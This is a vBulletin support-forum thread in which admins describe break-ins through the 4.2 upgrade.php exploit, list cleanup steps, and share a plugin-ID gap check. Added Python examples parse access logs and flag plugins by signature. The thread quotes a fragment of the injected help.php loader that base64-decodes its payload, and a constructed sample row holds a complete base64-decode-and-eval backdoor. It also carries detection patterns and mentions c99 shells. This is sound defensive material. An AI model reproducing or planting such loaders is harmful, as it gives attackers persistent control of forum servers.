vBulletin 4.2.5 is end of life and will not be receiving any future development. Warning: vBulletin 4.2.5 is not compatible with PHP 7.2.0 or higher.
I see it so many times... Too many times, in fact...
But that is all I see...
I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
I did remove the install folder at a very early stage in this recent exploit..
Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?
There really is no finite explanation/solution here....
I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:
remove vBulletin install directory
change the admin password
change MySQL password
remove hacker admin accounts
remove uploaded shell scripts
remove hacker plugins
remove hacker language variables
remove hacker notices
remove hacker announcements
block IP ranges that accessed the upgrade.php file or shell scripts
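The last item in that list, finding the addresses that hit upgrade.php or the uploaded shells, is the one people usually do by eye. The following is an added example (not code from the thread or from vBulletin) that does it over an Apache/nginx combined-format access log and emits the matching "Deny from" lines for .htaccess. It assumes the install directory sits at /install/ under the forum root and that shells were dropped as .php files under directories that should only hold uploads; both the paths and the log lines are constructed for the example.

```python
"""Added example, not from the thread: triage an access log for the
upgrade.php / shell-script requests the cleanup list above refers to.

Assumptions (not stated in the thread): combined log format, install scripts
under /install/, and uploaded shells living as .php files under upload-only
directories. The sample log below is constructed.
"""
import ipaddress
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths a legitimate visitor never requests on a finished installation.
SUSPECT_PATHS = (
    re.compile(r'/install/upgrade\.php', re.I),
    re.compile(r'/install/install\.php', re.I),
    # Assumption: PHP under data-only directories is an uploaded shell or a probe for one.
    re.compile(r'/(?:attachments|images|customavatars|customprofilepics)/.*\.php', re.I),
)

# Constructed sample: two upgrade.php requests, one shell fetch, one probe that 404ed.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2013:02:14:07 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Aug/2013:02:14:31 +0000] "POST /forum/install/upgrade.php?step=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.77 - - [29/Aug/2013:02:20:02 +0000] "GET /forum/attachments/c99.php HTTP/1.1" 200 24110 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Aug/2013:02:21:44 +0000] "GET /forum/forum.php HTTP/1.1" 200 30012 "-" "Mozilla/5.0"
192.0.2.10 - - [29/Aug/2013:02:22:01 +0000] "GET /forum/images/misc/upgrade.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspect_hits(lines):
    """Map client IP -> [(path, status)] for every request that touched a suspect path.
    404s are kept on purpose: a probe for a shell is still worth blocking."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if any(p.search(rec["path"]) for p in SUSPECT_PATHS):
            hits[rec["ip"]].append((rec["path"], int(rec["status"])))
    return dict(hits)


def deny_rules(ips, prefix=None):
    """Emit Apache 2.2 'Deny from' lines for .htaccess.
    prefix=None blocks the exact addresses; prefix=24 collapses them into /24
    ranges, which is what "block IP ranges" in the list above amounts to."""
    addrs = {ipaddress.ip_address(ip) for ip in ips}
    if prefix is None:
        targets = sorted(addrs, key=int)
    else:
        nets = {ipaddress.ip_network(f"{a}/{prefix}", strict=False) for a in addrs if a.version == 4}
        targets = sorted(nets, key=lambda n: int(n.network_address))
    return [f"Deny from {t}" for t in targets]


if __name__ == "__main__":
    found = suspect_hits(SAMPLE_LOG.splitlines())
    for ip, reqs in found.items():
        print(ip, reqs)
    print("\n".join(deny_rules(found, prefix=24)))
```

Run it against the real log with `suspect_hits(open("access.log"))`; the address list is also the set of IPs to search for in the controlpanel log and the PHP session table, since the same client usually did both the install-directory request and the later admin-panel activity.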
The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.
I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.
Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.
I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO is also in troubled waters. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this, make me really keen to get on and use that Xenforo license I bought a couple of months ago.
Edit: to add something constructive to my whinge, I did what may be a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and made sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:
SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';
I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.
Edit 2: I do have an entry in my control panel log for a user called ".", one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However, if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Or any way of checking what the modify actually was?
I had him get on my site too, but no damage was done... because I always double bag it.
NEVER EVER EVER EVER trust the security of vBulletin, WordPress, osCommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccess password protection.
I had admin accounts created on my website but, because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.
Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.
Someone may have mentioned these things already, I've not read the whole thread yet. But they bear repeating in any case.
Also yes, when an exploit is found, give more details, tell us what to look for.
Removing your version number won't really do much; there are still plenty of ways to find your site, so that is sort of moot.
We only give enough information, so as to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys. Not our customers.
Please check admincp/help.php, by clicking the "?" somewhere in the admin control panel. I've downloaded yesterday the 4.2.x version and it shows up a very bad page!
I noticed a plugin change with the following code:
if (strpos($_SERVER['PHP_SELF'],"help.php")) {
if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......
It seems that when accessing the HELP page, the plugin starts up some bad code.
Last edited by TheMax74; Sat 14th Sep '13, 3:07am.
Going through a site now with files that contained the code you posted above, along with a non-base64-encoded version in the plugin manager titled Skimlinks_vb with contents:
So that allows file uploads; check for shell scripts (the one you posted an image of is a very bad shell script; read more here: http://www.derekfountain.org/security_c99madshell.php), because by accessing your help.php page the hacker was able to let the c99 madshell interact with your site.
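Two checks from this thread belong together: the pluginid gap check against AUTO_INCREMENT from the earlier post, and the signature of the help.php-gated plugin posted above (the strpos on PHP_SELF, the hex-named function, base64_decode). The following is an added example, not code from the thread or from vBulletin, that runs both over rows exported from the plugin table. It assumes the rows carry the columns pluginid, title, hookname and phpcode (verify against your own schema), that next_auto_increment is the value returned by the information_schema query quoted earlier, and the sample rows are constructed, with the Skimlinks_vb row modelled on the snippet above.

```python
"""Added example, not from the thread: audit an export of the vBulletin plugin
table for (a) allocated-then-deleted pluginids and (b) the loader pattern in
the help.php plugin quoted above.

Assumptions: rows are dicts keyed pluginid/title/hookname/phpcode (column names
assumed, check your schema); next_auto_increment comes from information_schema.
The sample rows are constructed.
"""
import re

# Signatures: the first three are taken from the posted plugin code, the last
# two are generic PHP loader idioms that belong in the same check.
SIGNATURES = {
    "help.php gate": re.compile(r"""strpos\(\s*\$_SERVER\['PHP_SELF'\]\s*,\s*["']help\.php["']""", re.I),
    "base64 loader": re.compile(r"base64_decode\s*\(", re.I),
    "hex-named function": re.compile(r"function\s+T[0-9A-F]{16}\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "packed payload": re.compile(r"(?:gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}

SAMPLE_ROWS = [  # constructed
    {"pluginid": 1, "title": "Skimlinks", "hookname": "global_start",
     "phpcode": "// legitimate affiliate link rewriting\n$vbulletin->options['skim'] = 1;"},
    {"pluginid": 2, "title": "Related Topics", "hookname": "showthread_start",
     "phpcode": "$related = true;"},
    {"pluginid": 5, "title": "Skimlinks_vb", "hookname": "global_start",
     "phpcode": r'''if (strpos($_SERVER['PHP_SELF'],"help.php")) {
if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($x){$x=base64_decode($x);eval($x);}}
}'''},
]
NEXT_AUTO_INCREMENT = 7  # constructed: as if SELECT AUTO_INCREMENT returned 7


def id_gaps(plugin_ids, next_auto_increment, after_id=0):
    """IDs that were handed out but are no longer in the table: every id in
    (after_id, next_auto_increment) missing from plugin_ids. Pass the last
    plugin you know you created as after_id to ignore older, explained gaps.
    A gap only says a row was created and deleted, not what it did."""
    present = set(plugin_ids)
    return [i for i in range(after_id + 1, next_auto_increment) if i not in present]


def flag_plugins(rows):
    """Return [(pluginid, title, [matching signature names])] for suspicious rows.
    Matches are reported in SIGNATURES order so output is stable."""
    flagged = []
    for row in rows:
        code = row.get("phpcode") or ""
        names = [name for name, rx in SIGNATURES.items() if rx.search(code)]
        if names:
            flagged.append((row["pluginid"], row["title"], names))
    return flagged


def audit(rows, next_auto_increment, after_id=0):
    """Both checks in one report."""
    return {
        "gaps": id_gaps([r["pluginid"] for r in rows], next_auto_increment, after_id),
        "flagged": flag_plugins(rows),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_ROWS, NEXT_AUTO_INCREMENT, after_id=2)
    print("deleted ids:", report["gaps"])
    for pid, title, names in report["flagged"]:
        print(f"plugin {pid} ({title}): {', '.join(names)}")
```

Feed it `SELECT pluginid, title, hookname, phpcode FROM yourprefix_plugin` and the AUTO_INCREMENT value from the query quoted earlier. Hits on "base64 loader" or "packed payload" alone can be legitimate (some products ship encoded templates), so read the phpcode of anything flagged rather than deleting on sight; a row matching the help.php gate or a hex-named function is the pattern from this thread and should go, together with whatever file it writes.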
That is just great. I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not hear anything about this until I was hacked. I can't even access my site at this point. I own 7 VB sites; should I expect the other 6 to be trashed too?
How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin